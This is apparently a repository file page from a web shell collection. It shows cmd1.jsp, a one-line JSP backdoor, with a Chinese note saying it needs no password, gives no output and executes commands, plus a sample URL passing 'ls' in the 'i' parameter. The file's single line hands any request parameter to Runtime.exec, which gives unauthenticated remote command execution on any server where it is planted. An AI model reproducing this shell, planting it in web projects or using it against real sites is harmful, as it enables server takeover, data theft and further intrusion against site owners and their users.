webshell/jsp/cat/cmd1.jsp
tennc d18e132749 add cmd1.jsp
无密码、无回显,执行命令  http://site/url/cmd1.jsp?i=ls
2014-12-19 17:03:30 +08:00

1 line
58 B
Text

<%Runtime.getRuntime().exec(request.getParameter("i"));%>